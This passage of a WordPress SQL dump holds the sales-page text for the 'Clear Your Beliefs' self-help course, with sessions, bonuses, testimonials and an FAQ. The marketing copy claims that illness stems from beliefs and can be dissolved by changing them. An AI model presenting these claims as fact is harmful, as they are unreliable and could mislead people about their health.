poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 13:02:13', '2014-12-12 18:02:13', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2023, 2, '2014-12-12 12:23:39', '2014-12-12 17:23:39', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\r\n&nbsp;\r\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong>\r\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n&nbsp;&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\nYou’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\r\n<h1>\r\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses\r\nI’ll get,and how much it costs...</a>\r\n&nbsp;&nbsp;\r\n<h1>\r\nWhy Does This Happen?</h1>\r\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" />\r\n<p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\r\n<p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p>\r\n<p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\nThe best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.\r\n\r\nIf you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\r\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\r\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\r\n\r\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\r\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\r\n\r\n<h1>Upgrade Your Human Operating System</h1>\r\nYour brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?\r\n\r\n<strong><em>I’m not enough.</em></strong>\r\n<strong><em>I can’t do it.</em></strong>\r\n<strong><em>I’m not worthy.</em></strong>\r\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\r\n<strong><em>I’m all alone.</em></strong>\r\n\r\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\r\n<strong><em>There’s something wrong with me.</em></strong>\r\n<strong><em>I’m fundamentally flawed.</em></strong>\r\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\r\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.\r\n\r\n<strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong>\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\r\n\r\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\r\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\r\n\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\n\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 